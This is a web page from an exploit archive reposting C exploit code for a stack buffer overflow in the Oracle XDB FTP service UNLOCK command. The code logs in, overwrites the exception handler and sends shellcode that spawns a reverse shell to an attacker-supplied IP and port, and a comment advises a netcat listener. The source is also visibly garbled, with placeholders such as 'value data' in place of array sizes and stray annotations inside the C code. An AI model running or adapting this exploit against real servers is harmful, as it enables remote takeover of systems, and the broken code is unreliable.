首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Oracle XDB FTP service UNLOCK buffer overflow exploit that spawns a reverse shel
来源:vfocus.net 作者:mc2_s3lector 发布时间:2010-03-18  
[+] vulnerabilities network level/stack based buffer overflow
[+] special network layer attack
[+] implemented over http/XML-db/ftp==>windows XDB
[+] connecting:8080
[=] operation: win 32-->xdb overflow
[+] author mc2_s3lector
[+] yogyacarderlink.web.id/KeDai Computerworks.com	


exploit win32
#include <stdio.h>
#include <windows.h>
#include <winsock.h>
   
int GainControlOfOracle(char *, char *);
int StartWinsock(void);
int SetUpExploit(char *,int);
   
struct sockaddr_in s_sa;
struct hostent *he;
unsigned int addr;
char host[value data]="";
   
//register acces\\
unsigned char exploit[value data]=
"\x55\x8B\xEC\xEB\x03\x5B\xEB\x05\xE8\xF8\xFF\xFF\xFF\xBE\xFF\xFF"
"\xFF\xFF\x81\xF6\xDC\xFE\xFF\xFF\x03\xDE\x33\xC0\x50\x50\x50\x50"
"\x50\x50\x50\x50\x50\x50\xFF\xD3\x50\x68\x61\x72\x79\x41\x68\x4C"
"\x69\x62\x72\x68\x4C\x6F\x61\x64\x54\xFF\x75\xFC\xFF\x55\xF4\x89"
"\x45\xF0\x83\xC3\x63\x83\xC3\x5D\x33\xC9\xB1\x4E\xB2\xFF\x30\x13"
"\x83\xEB\x01\xE2\xF9\x43\x53\xFF\x75\xFC\xFF\x55\xF4\x89\x45\xEC"
"\x83\xC3\x10\x53\xFF\x75\xFC\xFF\x55\xF4\x89\x45\xE8\x83\xC3\x0C"
"\x53\xFF\x55\xF0\x89\x45\xF8\x83\xC3\x0C\x53\x50\xFF\x55\xF4\x89"
"\x45\xE4\x83\xC3\x0C\x53\xFF\x75\xF8\xFF\x55\xF4\x89\x45\xE0\x83"
"\xC3\x0C\x53\xFF\x75\xF8\xFF\x55\xF4\x89\x45\xDC\x83\xC3\x08\x89"
"\x5D\xD8\x33\xD2\x66\x83\xC2\x02\x54\x52\xFF\x55\xE4\x33\xC0\x33"
"\xC9\x66\xB9\x04\x01\x50\xE2\xFD\x89\x45\xD4\x89\x45\xD0\xBF\x0A"
"\x01\x01\x26\x89\x7D\xCC\x40\x40\x89\x45\xC8\x66\xB8\xFF\xFF\x66"
"\x35\xFF\xCA\x66\x89\x45\xCA\x6A\x01\x6A\x02\xFF\x55\xE0\x89\x45"
"\xE0\x6A\x10\x8D\x75\xC8\x56\x8B\x5D\xE0\x53\xFF\x55\xDC\x83\xC0"
"\x44\x89\x85\x58\xFF\xFF\xFF\x83\xC0\x5E\x83\xC0\x5E\x89\x45\x84"
"\x89\x5D\x90\x89\x5D\x94\x89\x5D\x98\x8D\xBD\x48\xFF\xFF\xFF\x57"
"\x8D\xBD\x58\xFF\xFF\xFF\x57\x33\xC0\x50\x50\x50\x83\xC0\x01\x50"
"\x83\xE8\x01\x50\x50\x8B\x5D\xD8\x53\x50\xFF\x55\xEC\xFF\x55\xE8"
"\x60\x33\xD2\x83\xC2\x30\x64\x8B\x02\x8B\x40\x0C\x8B\x70\x1C\xAD"
"\x8B\x50\x08\x52\x8B\xC2\x8B\xF2\x8B\xDA\x8B\xCA\x03\x52\x3C\x03"
"\x42\x78\x03\x58\x1C\x51\x6A\x1F\x59\x41\x03\x34\x08\x59\x03\x48"
"\x24\x5A\x52\x8B\xFA\x03\x3E\x81\x3F\x47\x65\x74\x50\x74\x08\x83"
"\xC6\x04\x83\xC1\x02\xEB\xEC\x83\xC7\x04\x81\x3F\x72\x6F\x63\x41"
"\x74\x08\x83\xC6\x04\x83\xC1\x02\xEB\xD9\x8B\xFA\x0F\xB7\x01\x03"
"\x3C\x83\x89\x7C\x24\x44\x8B\x3C\x24\x89\x7C\x24\x4C\x5F\x61\xC3"
"\x90\x90\x90\xBC\x8D\x9A\x9E\x8B\x9A\xAF\x8D\x90\x9C\x9A\x8C\x8C"
"\xBE\xFF\xFF\xBA\x87\x96\x8B\xAB\x97\x8D\x9A\x9E\x9B\xFF\xFF\xA8"
"\x8C\xCD\xA0\xCC\xCD\xD1\x9B\x93\x93\xFF\xFF\xA8\xAC\xBE\xAC\x8B"
"\x9E\x8D\x8B\x8A\x8F\xFF\xFF\xA8\xAC\xBE\xAC\x90\x9C\x94\x9A\x8B"
"\xBE\xFF\xFF\x9C\x90\x91\x91\x9A\x9C\x8B\xFF\x9C\x92\x9B\xFF\xFF"
"\xFF\xFF\xFF\xFF";
   
char exploit_code[value data]=
"UNLOCK / put character"
"put character"
"put character"
"put character"
"put character"  	--------->char or nummeric-----or combine chart&nummeric
"5eeefffggghhh";
   
char exception_handler[value dataX]="\x79\x9B\xf7\x77";
char short_jump[value dataX]="\xEB\x06\x90\x90";
   

int main(int argc, char *argv[])
{
     
     if(argc != 6)
     {
          printf("\n\n\tOracle XDB FTP Service UNLOCK Buffer Overflow Exploit");
          printf("\n\n\tSpawns a reverse shell to specified port");
          printf("\n\n\tUsage:\t%s host userid password ipaddress port",argv[0]);
          printf("\n\t6th maret 2010\n\n\n");
          return 0;
     }
   
     strncpy(host,argv[1],250);
     if(StartWinsock()==0)
          return printf("Error starting Winsock.\n");
   
     SetUpExploit(argv[4],atoi(argv[5]));
   
     strcat(exploit_code,short_jump);
     strcat(exploit_code,exception_handler);
     strcat(exploit_code,exploit);
     strcat(exploit_code,"\r\n");
   
     GainControlOfOracle(argv[2],argv[3]);
          
     return 0;
   
}          
   

int SetUpExploit(char *myip, int myport)--->protocol
{
     unsigned int ip=0;
     unsigned short prt=0;
     char *ipt="";
     char *prtt="";
   
     ip = inet_addr(myip);
   
     ipt = (char*)&ip;
     exploit[value data]=ipt[0];
     exploit[value data]=ipt[1];
     exploit[value data]=ipt[2];
     exploit[value data]=ipt[3];
   
     // set the TCP port to connect on
     // netcat should be listening on this port
     // e.g. nc -l -p 80
   
     prt = htons((unsigned short)myport);
     prt = prt ^ 0xFFFF;
     prtt = (char *) &prt;
     exploit[value data]=prtt[0];
     exploit[value data]=prtt[1];
   
     return 0;
}
   

int StartWinsock()
{
     int err=0;
     WORD wVersionRequested;
     WSADATA wsaData;
   
     wVersionRequested = MAKEWORD( 2, 0 );
     err = WSAStartup( wVersionRequested, &wsaData );
     if ( err != 0 )
          return 0;
     if ( LOBYTE( wsaData.wVersion ) != 2 || HIBYTE( wsaData.wVersion ) != 0 )
       {
          WSACleanup( );
          return 0;
     }
   
     if (isalpha(host[0]))
     {
          he = gethostbyname(host);
          s_sa.sin_addr.s_addr=INADDR_ANY;
          s_sa.sin_family=AF_INET;
          memcpy(&s_sa.sin_addr,he->h_addr,he->h_length);
       }
     else
     {
          addr = inet_addr(host);
          s_sa.sin_addr.s_addr=INADDR_ANY;
          s_sa.sin_family=AF_INET;
          memcpy(&s_sa.sin_addr,&addr,4);
          he = (struct hostent *)1;
     }
   
     if (he == NULL)
       {
          return 0;
       }
     return 1;
}
   

   
int GainControlOfOracle(char *user, char *pass)
{
   
     char usercmd[value dataXX]="user ";
     char passcmd[value dataXX]="pass ";
     char resp[1600]="";
     int snd=0,rcv=0;
     struct sockaddr_in r_addr;
     SOCKET sock;
   

     strncat(usercmd,user,230);
     strcat(usercmd,"\r\n");
     strncat(passcmd,pass,230);
     strcat(passcmd,"\r\n");
   

     sock=socket(AF_INET,SOCK_STREAM,0);
     if (sock==INVALID_SOCKET)
         return printf(" sock error");
   
     r_addr.sin_family=AF_INET;
     r_addr.sin_addr.s_addr=INADDR_ANY;        
     r_addr.sin_port=htons((unsigned short)0);
     s_sa.sin_port=htons((unsigned short)2100);
   
     
     if (connect(sock,(LPSOCKADDR)&s_sa,sizeof(s_sa))==SOCKET_ERROR)
          return printf("Connect error");
   
     rcv = recv(sock,resp,1500,0);
     printf("%s",resp);
     ZeroMemory(resp,1600);
   
    snd=send(sock, usercmd , strlen(usercmd) , 0);
     rcv = recv(sock,resp,1500,0);
     printf("%s",resp);
     ZeroMemory(resp,1600);
   
    snd=send(sock, passcmd , strlen(passcmd) , 0);
     rcv = recv(sock,resp,1500,0);
     printf("%s",resp);
     if(resp[0]=='5')
     {
          closesocket(sock);
          return printf("Failed to log in using user %s and password 
%s.\n",user,pass);
     }
     ZeroMemory(resp,1600);
   
     snd=send(sock, exploit_code, strlen(exploit_code) , 0);
   
     Sleep(2000);
   
     closesocket(sock);
     return 0;
}


big thank to;
================================================================================
indonesian black hat team(www.yogyacarderlink.web.id)
KeDaiComputerworks.com
Jasakom(jasakom.com)
indonesianhacker.org
Indesign COmputer Care (INDESIGN)
Indonesian hacker(indonesianhacker.org)
one-day(the-codec),n3r0,elpaciano
================================================================================

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Windisc Stack BOF exploit
·arp_sniff.c
·WFTPD 3.3 Remote REST DoS
·Linux Kernel 'net/ipv6/ip6_out
·Microsoft Virtual PC Hyperviso
·Linux Kernel 'fasync_helper()'
·iPhone Springboard Malformed C
·Windisc version 1.3 Stack Buff
·ArGoSoft FTP Server .NET v.1.0
·Virtual PC Hypervisor Memory P
·QuickZip 4.60.019 Stack BOF -
·Adobe Reader PDF LibTiff Integ
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved